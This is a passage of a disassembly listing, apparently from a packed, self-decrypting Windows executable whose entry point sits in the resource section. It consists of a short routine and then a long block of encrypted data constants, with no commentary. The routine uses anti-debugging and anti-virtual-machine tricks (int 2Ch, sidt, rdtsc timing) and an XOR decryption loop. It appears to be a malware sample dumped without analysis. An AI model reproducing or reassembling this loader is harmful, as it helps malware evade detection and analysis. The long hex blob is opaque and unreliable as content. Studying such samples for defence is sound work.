540000h, 610072h, 73006Eh, 61006Ch, 690074h dd 6E006Fh, 0 dd 4B00409h, 0Bh dup(0) assume ds:_data ; =============== S U B R O U T I N E ======================================= public start start proc near cld call loc_100742E start endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_1007406 proc near ; CODE XREF: .rsrc:0100747Dp push ebx mov ecx, 0DA5h mov ebx, edx loc_100740E: ; CODE XREF: sub_1007406+13j xor [eax], dx lea eax, [eax+2] xchg dl, dh lea edx, [ebx+edx] loop loc_100740E pop ebx retn sub_1007406 endp ; --------------------------------------------------------------------------- db 0F5h, 65h ; --------------------------------------------------------------------------- loc_100741F: ; CODE XREF: .rsrc:01007468j pop ebp retn ; --------------------------------------------------------------------------- loc_1007421: ; CODE XREF: .rsrc:01007436j ; .rsrc:01007447j push ebp mov eax, 8000h xor ecx, ecx jmp short loc_1007455 ; =============== S U B R O U T I N E ======================================= sub_100742B proc near ; CODE XREF: .rsrc:0100744Ap ; .rsrc:loc_1007450p rdtsc retn sub_100742B endp ; --------------------------------------------------------------------------- loc_100742E: ; CODE XREF: start+1p test eax, eax jnz short loc_100743A int 2Ch ; Internal routine for MSDOS (IRET) test eax, eax jns short loc_1007421 jmp short loc_1007449 ; --------------------------------------------------------------------------- loc_100743A: ; CODE XREF: .rsrc:01007430j push eax sidt fword ptr [esp-2] pop eax mov eax, [eax+6] shl eax, 10h jns short loc_1007421 loc_1007449: ; CODE XREF: .rsrc:01007438j push ebp call sub_100742B xchg eax, ecx loc_1007450: ; CODE XREF: .rsrc:01007486j call sub_100742B loc_1007455: ; CODE XREF: .rsrc:01007429j sub eax, ecx mov ebp, [esp+4] sub dword ptr [esp+4], 39B6h sub eax, 100h jnb short loc_100741F sub ebp, 301006h lea eax, [ebp+301082h] mov dx, [eax-65h] ; CODE XREF: .rsrc:0100748Bj call sub_1007406 push ds rol dword ptr gs:[edi], 1 jz short loc_1007450 xor al, 55h stosd jmp short near ptr loc_1007476+6 ; --------------------------------------------------------------------------- db 0EEh, 60h, 0F7h dd 0A53B2150h, 2C5746CEh, 6C172231h, 0DE31F68Dh, 45D58C5Ch dd 133227BFh, 810896C7h, 0BDDDB8C8h, 0AA45C5EEh, 60D5FC98h dd 0BDE68D9Dh, 0E6A00DA7h, 3C5B5050h, 1D742E06h, 0D620EE40h dd 2A46C3E6h, 835E1FADh, 5C5FFD8Eh, 36C6DC38h, 0E5446B2Bh dd 980FE6CAh, 28A590A4h, 51313D4Eh, 745B67C4h, 68C32677h dd 0B34EA64Dh, 7CDDA9A8h, 0D8D6566h, 0AD312918h, 4DAFFBCCh dd 0FC83C3ECh, 0D4555BBFh, 2FC0C721h, 0E5776524h, 843EE40Ch dd 25BDB8B4h, 4DD36435h, 0DD4A1719h, 730AEDDBh, 293D4842h dd 0EF1CAC61h, 320D0202h, 9698CDA8h, 0D82DB382h, 70E38B02h dd 6BDD6968h, 2989D1BBh, 0F8B19C1Eh, 0DF6F4A6Ch, 2F4A7057h dd 0C225301Fh, 0E2FD0E4Ch, 0C2DAE6D5h, 961D98F5h, 0B224119Bh dd 6FEBC6E3h, 5EFBDC98h, 0A3A19C87h, 68FAEF23h, 47086261h dd 12A78C01h, 67781917h, 4D977318h, 33F3E2D0h, 9C5E9E27h dd 0FC48097Dh, 0C15DDFEEh, 9F1F2F0Bh, 5F09927Fh, 55D5E5DDh dd 9DD5B44Ah, 0CA9B9689h, 0E1F91EE8h, 0C0515C8Eh, 71B8F03Eh dd 1EC41150h, 0D9627D6Bh, 75C4D4Fh, 0D3702311h, 88737E1Ch dd 4C5B26D7h, 1D29041Eh, 0B400804Dh, 0D9DFEAEBh, 0B93AF0CEh dd 0EB1EA0AEh, 5FE7EF40h, 0BAA7D454h, 98A580BFh, 4011F69Fh dd 34FE9565h, 65A4222h, 897BE090h, 5135B745h, 7DD7D44h dd 1989DE2Ch, 0FD2A017Bh, 1FC4A41Ch, 0A2333D55h, 1F1B6698h dd 0DAE9C4D8h, 74C16F8Ah, 0D672EA6h, 36D0504h, 0AC540A5Eh dd 9FB0BFB9h, 7B0B167Ch, 34F38E6Fh, 0B5C1FCE1h, 509828E5h dd 8C778282h, 41BA8DDBh, 0F62D3C36h, 0FB605291h, 2E284BBh dd 0AC3E482Fh, 0E90C5BA2h, 0BF3CED6h, 0BE4F5952h, 3248214Ch dd 71EC0F3Eh, 265F6A69h, 2ABAC76Eh, 664C2075h, 1F7A1170h dd 0BE7BF40h, 55D7DA30h, 0DD843108h, 43DCE7D6h, 0A735CFC5h dd 294759Ch, 9A2F7F7h, 0B80B1E16h, 3FBF3852h, 0D8700838h dd 0C86874DCh, 9E3E778Eh, 7E3E3561h, 31FA79C2h, 34C4CD0Ah dd 0A3B697AAh, 0E57A85B4h, 45D7B95Bh, 0DDB5B03Ah, 48BA6B9h dd 0D369F080h, 0B1716772h, 27A51A27h, 99080231h, 465D5D5Bh dd 1CADBA8Ch, 5B99969Ah, 0A29C6E5Ch, 0AB3B46C6h, 9191409h dd 0D35FF9C0h, 3E3025D8h, 82AD3A33h, 7F85908Ch, 7FCC6A6Ch dd 0AB4BB944h, 2E1B2410h, 0DD71FBCAh, 0BB7B7DD8h, 16A64E4Fh dd 70FD8B04h, 41D76766h, 2787EE44h, 0F3ED04FFh, 47E8F776h dd 0B9C8E3F9h, 0A308B490h, 0EE817688h, 925EEBE3h, 4C343F3Fh dd 0FF8F9B7Fh, 76154879h, 7ACE507Fh, 0C956ABC0h, 0E9FF76FAh dd 853C62BEh, 4AE645B9h, 0F6147D15h, 0E672E5C5h, 31DE74CBh dd 88902826h, 18877DCCh, 0CF78B823h, 9D2E7433h, 53EF9492h dd 0F8E0A860h, 0C893AE7Ah, 82614708h, 0CF4952Ah, 0BF4F3A0Dh dd 1AC0793Fh, 756FD484h, 0D0606B02h, 7AFBACCDh, 0D6184B72h dd 0CDF8E984h, 0BF94D7E6h, 0C34F72F5h, 79828DECh, 0C6DD8233h dd 0C23C298Eh, 5191F49Dh, 0A85F892h, 0D3485333h, 0EBC9FFAEh dd 0E36BF659h, 9659544Fh, 2B4B3AE7h, 7F0E279Dh, 0DADFF874h dd 8CC5E0DFh, 9020233Fh, 4E88690Eh, 56D60C61h, 24BC3C0Bh dd 0FCBC8390h, 0C26A120Eh, 0B272541Eh, 4C0857F5h, 8FF8332Eh dd 0C2535E4Ah, 76C1D6FBh, 0A596467h, 0BF0D1904h, 78DAADADh dd 0EC6F4942h, 1B25803Fh, 0FFB024Ch, 47AEBF34h, 0A586A1A4h dd 3AC186BEh, 3EA9B8BAh, 8397928Ch, 5E84A33Bh, 0EA4E3DC0h dd 7D7339E7h, 63EA5F0Dh, 9E5D6867h, 4ADD87A7h, 0F1437968h dd 0B2070F11h, 39ACB3B6h, 49B1D078h, 647FBAA2h, 1C8CB320h dd 5A62166Fh, 30BCE20Fh, 4B2E76F5h, 7BD0AF07h, 7BA09B80h dd 94F96C06h, 0F67A64F5h, 209905BBh, 579B1716h, 0F36BFB90h dd 0A73D9A98h, 8D2D0476h, 4DFB75B1h, 43E3F230h, 61796D38h dd 0C9A5C106h, 20246AEEh, 51BC0C15h, 0F574D7A0h, 0FFCDB8Bh dd 3F65305Ah, 2B86F820h, 2C59510h, 2488F8B7h, 1FBBC6C2h dd 0B7F5B0E8h, 0CE9CF945h, 15B9D7E7h, 88C7F3B3h, 0A7D28D8Dh dd 1E8CBEB8h, 3CC71013h, 4A3B563h, 2BB4387Ch, 9E3CAC5Bh dd 0F82621A7h, 87FE3926h, 35A69908h, 0E82140ECh, 6B0F2A31h dd 0F3AEF4EDh, 61C5D0D1h, 0BAEDBED4h, 798486B6h, 47E6CA2Ch dd 5DCBD2D5h, 0FD8C9768h, 6BBDF2F2h, 0E2131C84h, 0E9CC0F9h dd 0AC730307h, 0CF390E0Ch, 0DDFC7D33h, 2D7F7145h, 2B84876Eh dd 0BA323536h, 8A2A3068h, 0B524D12Dh, 6B014E25h, 5FA83605h dd 90D52B0h, 51B9B4B3h, 0AC3C6712h, 797B203h, 62F1FCFDh dd 0BD4C5757h, 18A7B2B2h, 8C515B5Ch, 0FE76B1FDh, 85E168C3h dd 7F66DE9Ah, 83AD979Bh, 5FBAB596h, 0F0494E61h, 9A1DC5EEh dd 38AE8680h, 0C550131Ch, 73F9CDEFh, 30EA8082h, 0D4372422h dd 7EA0DFCDh, 897274h, 84560F04h, 56D0D9CEh, 11655172h dd 9B673317h, 47A3A8BFh, 0E2746E4Dh, 9919CEE6h, 23BDB7AEh dd 0ED6D3978h, 9FFDF5F1h, 368B9DBFh, 0F14C392Fh, 6EE8E6A5h dd 37907461h, 0B43F363Fh, 69C3E2D0h, 76627075h, 0B0041E28h dd 44E8A2B2h, 0E3764753h, 87003E7Ch, 69A8ACB6h, 0F0445C5Dh dd 0C0F3E2E8h, 2FB0BADAh, 0C6513733h, 7CD19FEAh, 37BA8D90h dd 0DE283126h, 61C1E8AFh, 0A93634Ch, 0B82E1125h, 51C0A2D6h dd 8051687Fh, 9D1F1332h, 65A3BDB9h, 91445642h, 0AA08E2C1h dd 13B28E88h, 0A2575055h, 0B0F9FDD0h, 349D979Dh, 0DF2A0828h dd 63FFE7CDh, 2FF94566h, 0AC192B38h, 7BC3CFDCh, 1D64745Bh dd 0D4241502h, 7CB4AE8Eh, 0EF6F555Dh, 971FC512h, 2FA5BFBFh dd 9B6D4E47h, 0A2F3F7D7h, 1792808Eh, 0E258242Fh, 46FDCEC0h dd 1697BAFCh, 0CD203D03h, 70DCD2E2h, 16440E4Ch, 0BC3B3F1Ch dd 47D6ADB0h, 0F071581Eh, 0AC1D1F2Fh, 7FA4BABDh, 0D2257157h dd 9FD6FFEFh, 2EB69389h, 0C9502F09h, 75F0F1E9h, 1D85999Fh dd 0C3231651h, 76CFC5FBh, 288F7068h, 0A4321008h, 5BC0D2C8h dd 12615F17h, 99041210h, 50ACA2A1h, 0EF716528h, 8B10C8E7h dd 3DA6BEACh, 0FE623A78h, 9FE3C3E4h, 1383BF98h, 0B0252723h dd 65FED6EAh, 9A6846h, 0B0213D17h, 5ACBD9DCh, 13775D10h dd 0BE103D05h, 5FCEADA5h, 0E86A7321h, 91001B1Fh, 5488EBE4h dd 985D4740h, 90EBFDDDh, 7DAC998Dh, 0D15F0B71h, 61C7A0EAh dd 36A99E98h, 0E94A3038h, 7CE3C4CAh, 4416E66h, 0A9321411h dd 55D3B5B5h, 0E4421C5Ah, 0B0053102h, 5EA882B4h, 0E0475942h dd 9918DB87h, 2DB48AA4h, 0C65E5769h, 9BE2CA98h, 0CE98496h dd 0C4252220h, 78FAC3FFh, 0BC634Bh, 92550532h, 6AC4C9D0h dd 164A7A75h, 0D5051E03h, 44A8BE9Dh, 0E7756140h, 923982E5h dd 34B8B99Ah, 0EE7D4C45h, 9BE1E5F8h, 21868989h, 0C8552613h dd 7CD7A4CCh, 2968CBEh, 0D7083C2Ch, 57A9D1DFh, 11764C7Ah dd 9F3A1E08h, 4FD9AAB6h, 0CB15536Ch, 8502380Eh, 6BAEA2B4h dd 0F3455E42h, 89C4FFF8h, 0FA8A9E6h, 0D3562733h, 61F7CEF9h dd 33839E83h, 0F5331C52h, 7AF4DDCCh, 0BB27F6Dh, 0BC3B0631h dd 23DDD1D4h, 0E416D56h, 0B02F1A16h, 7AC4AAA2h, 0EA6F655Dh dd 8508D5EAh, 36A685BCh, 0C55B546Eh, 8FC596FBh, 388381BFh dd 0C5222918h, 0CF2C8CFh, 14A7764Fh, 0A2372934h, 6EC4EEC2h dd 1B696665h, 0BD0E0B21h, 63BEB0B5h, 0ED6C7556h, 9A27060Fh dd 53AAAEABh, 0F64C5B7Ah, 80E4FDFCh, 4F8E8480h, 0D86C320Ah dd 53F3D5F6h, 15848993h dd 0DE063A34h, 6FD4DEDDh, 1D755E0Bh, 0AF350933h, 74D2A6AEh dd 0EC7B6F68h, 9C022C10h, 6BA1A0BCh, 0FD4A5C59h, 0BD2989EFh dd 28ADB7A2h, 0D4414B4Ch, 90E3F999h, 35999087h, 0C1203B2Ch dd 7ECFC8AAh, 1E98636Bh, 0B133065Fh, 54C2D3D2h, 1A626E77h dd 0A467171Dh, 31B4AEAEh, 0E8734D55h, 8417F081h, 42A7BBB7h dd 0F85A577Eh, 8CECFAE0h, 208B83AEh, 0C05E022Dh, 9FFC9C7h dd 18091B7h, 0CB2A342Bh, 59DED0F3h, 106B7E60h, 0B4051F09h dd 5FDAB296h, 0E85F2145h, 8F03190Fh, 4C83A3B3h, 97665C54h dd 97F6E3C5h, 39B88695h, 0C65D330Dh, 42FFECC8h, 2A83B1F8h dd 0DC262136h, 75C6FCDAh, 2974F6Dh, 8D186406h, 6DE4FEE8h dd 3B21282Ah, 886A3938h, 5986B7AAh, 0DB455845h, 0B97BFFE0h dd 36998685h, 0C47A525Eh, 0BDF4D2EFh, 3082A0F1h, 0C027381Dh dd 61FCFEDEh, 1FBD6677h, 0A7015E1Dh, 69CBEAD0h, 0D657544h dd 921C2A08h, 2B5649C8h, 0E14BED08h, 0C75807Eh, 3CF49754h dd 9F41365Eh, 9FD5C1DEh, 2D67EFh, 0FF6C93CEh, 54C6E2CAh dd 0FC6403A8h, 3F4C677Ah, 8258BE75h, 723221A9h, 0E55ACE4h dd 813D4E95h, 0B0132E08h, 0DE042987h, 0AC36DAB9h, 94140367h dd 6B704A0Ch, 4ADAE574h, 0C561286Fh, 0D41B9B9Ah, 9761F59Fh dd 0B62D103Ah, 7BA0BBABh, 6B915404h, 0C6363508h, 70B1D6BBh dd 0E9F34745h, 0D7575EFCh, 0A73D9493h, 8D2D03EAh, 0B40C7C07h dd 56535356h, 92CD3908h, 0E989011Eh, 85E7EFDEh, 7DC0191Eh dd 26E7202Fh, 0EA79FFCFh, 0C04F4162h, 0E455E15Dh, 0E7809BEFh dd 5C605B47h, 2CA04349h, 7855C921h, 67FA8383h, 3DFCFB56h dd 83ABBDBFh, 0C16A8D8Dh, 0C5221717h, 9914C6C6h, 70531B9Eh dd 0C66275F2h, 5248534Fh, 0EA5C51B2h, 0ACA1CE81h, 0CA598C31h dd 0A4E9BFBFh, 0B0159CF7h, 56A34675h, 6E53055h, 0C0747A2Bh dd 0BD2AD6D7h, 6BD7741Eh, 0A6B63C0Ch, 301968B3h, 5E7C2D9h dd 0E642498Fh, 0E9DA840h, 85795E03h, 0C36344E8h, 8B2346D2h dd 79390E93h, 0F4A93D3Eh, 2F95CAEDh, 0EC16E1A7h, 0FFB305B8h dd 601DDBEAh, 81E3B3F2h, 0F6A291A0h, 92BCECC1h, 0AD56462Ch dd 7468915Eh, 0E7E403F8h, 0D5BC2397h, 18A7B2B9h, 7059DD86h dd 7BD05438h, 2988D927h, 851FA495h, 55E57979h, 3AC9D5DCh dd 5E0FD72Ch, 3B401EAh, 4EAE8443h, 4DC0A207h, 0E571859h dd 0F3E7EA1h, 0E3159CDAh, 40F1EBC6h, 0F904F96Dh, 0C7664DFCh dd 0A9BD783Fh, 4D201E82h, 5BB05972h, 3405CA27h, 8EF52842h dd 2A7BD40Ah, 68244BB7h, 1B2B3909h, 3ABA9C9Ch, 0DCFE5FADh dd 8013BDDFh, 867852A5h, 9B5F6142h, 3B12E93h, 1BAB5EE0h dd 0F75B1110h, 0E17A1A86h, 0D7214CC6h, 417120Dh, 0E27A5900h dd 3D745CD8h, 74A93332h, 0F3838C85h, 4FDA81BCh, 3CC64443h dd 4A4B3B7h, 0DB630572h, 0BA485070h, 15CEFFAFh, 6FFF0EE2h dd 9E083364h, 0B04A97BFh, 8020373Fh, 4CE6BF46h, 36C6D0D4h dd 934B7D7Ah, 847DEDD7h, 7D7E2E1h, 53A7C26Eh, 6B8DA8BCh dd 39C0577h, 0B72B1A1Dh, 599EA9A9h, 48DDB0FCh, 3C545F5Fh dd 2E83632Dh, 0B98F4C13h, 0C086661Ah, 45144099h, 0DD4A7424h dd 90E37E29h, 19D1ECF6h, 4B59F7B0h, 3B126DC6h, 0DCE2DDC0h dd 0FB6F0C11h, 8AC0E7CBh, 62F3F96Bh, 7D7EF357h, 0EBF1A3D8h dd 23535EA6h, 9E0E3938h, 0D02C3B91h, 5142F35h, 0DF6D72BDh dd 1EBE2AD4h, 5CB0CF27h, 0A380BBA6h, 6712731Ah, 646B4170h dd 3F119C9Fh, 1AEA83FCh, 0A23ADCDAh, 0B42AC9Ch, 7CFC928Ah dd 16546251h, 0A66042EAh, 828517D7h, 0D7687372h, 33C33E49h dd 0B420A928h, 693F94F6h, 0C0DBDFE0h, 9F2F3AD8h, 8FAAAB14h dd 6B64B61Eh, 0F70E021Ah, 0C41084D0h, 2AF747C6h, 0AA009271h dd 48FAE6B5h, 5AC687EFh, 0EA3B6D5Bh, 9338C707h, 6E182321h dd 0E2737ECDh, 6F9EE756h, 1D26627Bh, 0F3848F28h, 0E2D72C6Bh dd 2D35487Fh, 495A007h, 0AC9ADAC5h, 0B57069F8h, 15A53C2Ah dd 500DA60Ah, 0F67B4645h, 52D3A6E1h, 0BDBD636Eh, 5D100256h dd 5FE72DAFh, 0E3575958h, 9D7EF606h, 3DF7CCD8h, 5C74F855h dd 44BF9698h, 59E9D3E3h, 4B16ADB9h, 3FB3C33Ch, 393A3604h dd 2C05300Eh, 1FB0BBB0h, 147C7950h, 0B1071E03h, 0E15433CAh dd 0E1C1709h, 0D541F640h, 0BA575412h, 0CD2D081Ah, 0F78B93F9h dd 4B2BF68h, 78ABB617h, 8599948Eh, 53E88E68h, 777D0958h dd 4BF9E5E7h, 0E1FB5E5Fh, 0CF6F4668h, 0D59EC143h, 0B53EED8Ah dd 60B3837Ah, 0BDEB958h, 55DF3030h, 0F5A5D000h, 4CDCE70Eh dd 4AB61F41h, 2A280E1h, 6DAF4A7Ch, 0DCC5262h, 13929DE6h dd 0E076F30Bh, 0C8685325h, 0A6381B4Eh, 7E3E295Bh, 0E956E1F8h dd 0B1C7CFFEh, 8F2F1A1Eh, 6212870Dh, 0BAD5E0CCh, 901C52AFh dd 0A7427D95h, 3F9094B4h, 0E11D2928h, 65EFDECEh, 2B9B6362h dd 0B33D303Eh, 0CE9EB8CFh, 815ADC9Ah, 33E03CB5h, 2EFEA3C4h dd 0E24B73DBh, 58C1F265h, 87CFEAC5h, 992A3524h, 0AC89403h dd 291F1416h, 0E73FCBEFh, 596A19Fh, 277D509Ch, 5F79FD51h dd 0F40DD71Ch, 429481F0h, 985C5756h, 0D8E5C4ABh, 0B23E8489h dd 0F919F377h, 200C50DAh, 162CEEA8h, 0EE7E882Dh, 69B1E489h dd 0F2343F3Fh, 6A7091F3h, 5ADAD955h, 3E490EC4h, 8D29BBE4h dd 6ACB3632h, 0F56DECD6h, 0C330BC8Ah, 74F3E715h, 0D60D2121h dd 843DCBA1h, 8C2D1815h, 0CB3D167Eh, 0BD83DEECh, 0AD1E0A82h dd 351C6B92h, 0BE4DFC6h, 0A1AC8ACDh, 99BF127h, 5F7599FEh dd 0B33B0014h, 773F4AE7h, 9C052023h, 0D0606A2Bh, 2B737848h dd 31192120h, 95FC6235h, 38A4C8E7h, 0C0273230h, 0DEA31873h dd 1A8BE8D7h, 83D1D6BDh, 40189EADh, 0D52EFBC4h, 6A4B2B03h dd 9F83DC25h, 5A731143h, 0CAF43550h, 25CC3E7Dh, 0D6A497Ch dd 28887000h, 1C683B96h, 0E2AB0F26h, 1878DFA1h, 49CAB36Bh dd 0A27F388Ch, 7EB81C45h, 196C01F2h, 8DF7C444h, 869D9897h dd 504D3834h, 0B0536E6Ch, 2A1B9234h, 43092422h, 0E35454D8h dd 5F3CC5C8h, 0BAE5DADCh, 0A7C009BEh, 0B6D0EBE9h, 0AA1B71B9h dd 9FD6C18Fh, 518BBCE9h, 0AB3C472Dh, 8368F520h, 61C1E983h dd 97BDC2A9h, 9A58B281h, 72321874h, 0C2A290E4h, 0D747F846h dd 0B09697E2h, 0B46E4948h, 6FC9BED3h, 0F5B1D07Eh, 647FBAA5h dd 7AEAA261h, 0A7D5813Fh, 0FACBCAh, 77D7600Ah, 33CC5060h dd 11909BE0h, 6B91D28Dh, 96649E32h, 11820944h, 0E9F31726h dd 0D7575E28h, 2F14847h, 89942817h, 25ED7CA6h, 0C8D3EEF6h dd 2BA5056Bh, 0F9B9A4D8h, 60FEBB65h, 3A14B4C2h, 0AAA9593h dd 55B37274h, 0EBE25A6Ah, 0E1481E77h, 6B71959Dh, 80316B5Bh dd 7DEA9695h, 0AB17B4DEh, 1D217C4Ch, 0DE71A42h, 0EB02F132h dd 96B8A7B7h, 22BF8986h, 0E9022726h, 68F6F6EDh, 71DFCB95h dd 96243F30h, 46A39F82h, 2AAA5A53h, 0BF1A3829h, 4BD1CDCDh dd 0EE60596Eh, 0B7050701h, 6AB1B583h, 0E7524E78h, 9F1EE5EFh dd 26BEB2BDh, 0E355594Eh, 8EE9F4F4h, 39B7AE81h, 0D62F2C3Fh dd 7DEFCDDCh, 1A91455Fh, 0AF322938h, 72C1E9D4h, 2570777Ah dd 0BA051B3Dh, 4BCDABADh, 0EC755774h, 0B910EC16h, 28A4AE9Bh dd 0E142445Ah, 86C7F5F5h, 3288809Bh, 0C3553327h, 4BCBD1CFh dd 62858F95h, 0E90A1804h, 5DF5F3E5h, 106B4051h, 0A12E071Ah dd 7EE4B7A5h, 0EB777077h, 9C320A0Eh, 5FBBA6A1h, 0F0725B41h dd 9F16F9F8h, 339FB98Bh dd 0D45A2C30h, 5590E9FEh, 398D8797h, 0C42A1825h, 12A2ABD8h dd 1EAE5607h, 0B526B1EEh, 4FD8C4D3h, 16787939h, 0A80B1C00h dd 5DABE3ACh, 0C01D474Eh, 0C933C0CAh, 21A5B4B3h, 0F14F4C4Fh dd 0BFDAC19Eh, 1F92CFBDh, 90710305h, 79F3D383h, 6FC67574h dd 0C050B30Fh, 9AF6B6B5h, 4626F7FDh, 0BEE4AA6Bh, 2CBCF7D3h dd 0AB3AB7DEh, 0AB37D4Ch, 579CACC8h, 799DB82Ch, 0AA83BEA6h dd 3BF0D544h, 97B82269h, 27E18261h, 731F4474h, 0CCC25464h dd 7301F8ADh, 617A87AFh, 455A554Fh, 159EF43Ah, 0C699E11Ah dd 2525FA8Fh, 0D4C7602Bh, 6E94A1E4h, 847CB7AAh, 47D7E3E5h dd 9BA7C26Ah, 148DA8BBh, 58E8F37Bh, 0A6EACBC0h, 64CEA998h dd 97F76E03h, 0F37816C8h, 3AD339B8h, 87F111Bh, 0D4657886h dd 6C8698C9h, 0C657620Ah, 0F8E37E7Fh, 4BD1ECF6h, 0F13843F5h dd 9E6FC292h, 0AE1D1212h, 9C1691D3h, 735826A1h, 8A2202FEh dd 0BD4D585Ch, 47EBF5E1h, 372D5D42h, 315E2524h, 1995D956h dd 7D55F71Eh, 6AE28586h, 3AFAF92Bh, 95243447h, 657FDD8Ah dd 4BEBCAC4h, 0A6364CA8h, 53D5C09Bh, 0EAEA0BFh, 0E3030D02h dd 0EDF7ACEFh, 5CD7EE92h, 0C7508A61h, 6AEEBDBCh, 2E594B58h dd 4D972572h, 33F3E524h, 0DF4FE01Bh, 832887E9h, 44D4B7DFh dd 60797A39h, 0CAA16401h, 0AA1D73EFh, 3D10683Eh, 3BB75930h dd 0FE7B8C00h, 0AA516C7Dh, 1C4E5B5h, 27071210h, 0A4F7923Bh dd 0D3BDF8EAh, 0B733EEB4h, 0E278967Ch, 6E9BD9D7h, 0AA1A6677h dd 0BFC8CBA3h, 0F4A15E8h, 413A756Fh, 495A094h, 2D9F898Eh dd 0DC3E3B3Dh, 0EAF5B0EEh, 402BD29Fh, 2EDEEF65h, 29B6F1EBh dd 0D39C912Ah, 556C476Fh, 7EB2554h, 7DD7C2Ch, 0ED4DA4C6h dd 48DC8B71h, 16BE3E3Dh, 0FEBE80C7h, 845479AAh, 5C447F62h dd 0F0605855h, 0CD7FC262h, 0C455507Eh, 0B91538E9h, 7A0B2634h dd 0F502E4E2h, 6491CCFAh, 8B76264Fh, 0E675EAD2h, 0D42D5DDBh dd 9C1D14D7h, 82D25314h, 0C56E63CEh, 0FF3E7967h, 0BD14A2C8h dd 63C3DE59h, 0EE1E0F0Ch, 8C56E6E2h, 743423EBh, 12CA9531h dd 0ECBAF5E8h, 0B53BDE9Ah, 8E987B7Ah, 0C4342927h, 0A6344CBDh dd 0BD044B8Bh, 1ADCD7F3h, 4F041D15h, 0FD6D6FC5h, 48A07230h dd 0EC115262h, 594A99F2h, 0AA02F7FAh, 0F84D2FE7h, 7CCBE8BDh dd 8C35F12Ch, 5CAE8B8Ch, 34F4DA82h, 0DB694F7Fh, 6FF74CB7h dd 45E5D090h, 0F1616A6Bh, 0AADAC7C5h, 7AD3640Fh, 24BE4C7Bh dd 0CAC8B8Bh, 13E8EAC0h, 0C15EB52Fh, 54FEB8B6h, 2749445Dh dd 9E274025h, 0B841C98Bh, 88290863h, 0E3747395h, 6D8789D8h dd 0F87C4156h, 0B5E0E5E2h, 0DA1FBBE9h, 0AA0B6D9Dh, 0FA232C0Ch dd 8F0CBD6h, 0BB4B569Dh, 0E9A6DBE6h, 412D159Eh, 1EC9EA66h dd 0AAB7F2DEh, 0B23FDAA1h, 8A3F2E77h, 132D462Dh, 57A02E1Dh dd 1EB0484h, 19D9D4FCh, 0F2355569h, 0FF8DF2CBh, 891575F4h dd 4ABF4DA7h, 221D2855h, 6AFB3610h, 4D3E6A2Bh, 0DFB1BCA9h dd 4B207E80h, 0D66B9A70h, 6295CDCBh, 0BF566B69h, 0AB3CADB3h dd 0D72CDE90h, 9D1E1576h, 0F88EFC01h, 0E669EFEDh, 0AE0F52FEh dd 0A42728FAh, 8CF4CFD2h, 40B0ABD5h, 1AAAB95Ch, 3B4C470Fh dd 84252523h, 67F782EBh, 0C783DE20h, 64714C57h, 948D816h dd 4273233h, 0F28288E4h, 0B96865E7h, 0F138735Ah, 2F5A2310h dd 0B05F8C8h, 3AB7ACA2h, 248F6313h, 0EAF10909h, 0C9596673h dd 2524533Fh, 175B1A19h, 0DA6A7475h, 19684530h, 54A12B1Ah dd 0EB7B8715h, 2C026AB0h, 34CE6E3Bh, 0FCBCBB5Bh, 22BE3274h dd 0A1CA2541h, 9862A8A7h, 67C82F6Bh, 7FD0BCB7h, 1D9E9911h dd 0F5206112h, 0E344C5E8h, 0BB409AC8h, 892A099Ah, 607A40FBh dd 3FD0DA50h, 112776BFh, 7AB66E8Fh, 60C14A6Fh, 55B98145h dd 797928Eh, 609BFC91h, 29B3553Ch, 17979E74h, 7DFDF58Fh dd 0CD5C08E3h, 0BD3550C2h, 83233EBFh, 8D3C6912h, 157C412Ch dd 54A12F1Eh, 0EE3F0F86h, 0F757E5E4h, 0A50560FBh, 7178932Bh dd 33150A03h, 0B64550C4h, 984680F5h, 94AF2232h, 0F67A50F5h dd 0F30C31BBh, 0CD0C2736h, 21359A70h, 0A74F3233h, 8D2D0898h dd 0FC1083E8h, 11D3DEDDh, 5FBBC66Bh, 7489A4BFh, 0D9F0CBAAh dd 9F0F05DCh, 0BC95F5A4h, 41B074F5h, 0C8AF9B4Eh, 9ABFFB7h dd 3C17125Ah, 0F5246068h, 235A46CEh, 0D61EC1E0h, 0F2553877h dd 0B09CE528h, 0A80BCD8Fh, 0F39E658Dh, 60F8E8E8h, 87183B75h dd 3EB3B0BEh, 71C8DDDCh, 0C26D2B6Ch, 1FD08B8Fh, 21B74640h dd 350E6444h, 159F5A2Ah, 2CCB9B1Ah, 0B16A7575h, 659280D0h dd 0BDE1BED4h, 61F086B6h, 47E6F4D3h, 0B9D23C56h, 0AC815EFCh dd 58E7F71Ah, 0D7676B4Dh, 0F1CAA8A2h, 58D3E696h, 0CF97DD5Dh dd 76A552E8h, 7909141Bh, 0F4BCD2E3h, 7CE8CAF9h, 0A6DBB0DBh dd 25F0804Fh, 0F55D8FA4h, 9B1B1ACAh, 0E3B43413h, 0DCE1ECDBh dd 9C12B9CBh, 6D5989A1h, 31A7ADFCh, 91F1C2A8h, 0E024B282h dd 0E22D730Dh, 7BD096E3h, 2988EF3Ch, 2AE113AEh, 370E690Ch dd 0C536228Eh, 76335D4Eh, 0F1080783h, 84510F0Eh, 1BB88E6Bh dd 1A0B764h, 0AB6D5105h, 4816E9BAh, 228C1A39h, 3468607h dd 0C6565174h, 12D996C8h, 820C1762h, 0E84B1BE7h, 0CD7F4DCDh dd 8E1D1806h, 6CBF92F7h, 44E3FE78h, 9F2E3939h, 0D4771152h dd 0BCE4EFDFh, 4FC0B442h, 0B9E67F8h, 4B0AB58Dh, 3F065B6Ah dd 2B87BB20h, 89FE9210h, 0D1DAE864h, 0A935C7C6h, 87271222h dd 1D247D16h, 0DE18542h, 97E8B632h, 0F3832A09h, 1E1EC2E8h dd 0F93A2E13h, 4FC9EF4h, 92EF9F9h, 91B8C1ABh, 0ED27AF9Fh dd 5D7B05F5h, 435A6560h, 1585C73Ah, 8B9D961Ah, 566B4645h dd 6F6C245h, 0FB737D2Bh, 7983D786h, 47E7CEF4h, 0ADCDC5BFh dd 0FD899813h, 0A7E899F2h, 837349F8h, 1F0B56A8h, 0EBF9342Fh dd 475BA0A5h, 1EAFB951h, 4911909Ah, 1D56705Eh, 7F9108CAh dd 0DB1F4C75h, 0D5713480h, 0D52EDCEAh, 9B1C1CC0h, 72885215h dd 51E2EE2Eh, 29B48175h, 7A893BEh, 0AA3ACADh, 0BD425848h dd 5D3D4CE2h, 0F6033E21h, 0B0DA66A8h, 0A0B9C4C0h, 0B4243C9Bh dd 94E4B979h, 5A996DECh, 4716302Fh, 1774A89h, 0CE520712h dd 0A606716Fh, 0B9ADD710h, 5CEBED3Ah, 76458362h, 0F3565D5Bh dd 5CDB828Eh, 0C8946251h, 0DBB4F60Bh, 2E802EF4h, 9BDF7C6Ah dd 7A13CDD9h, 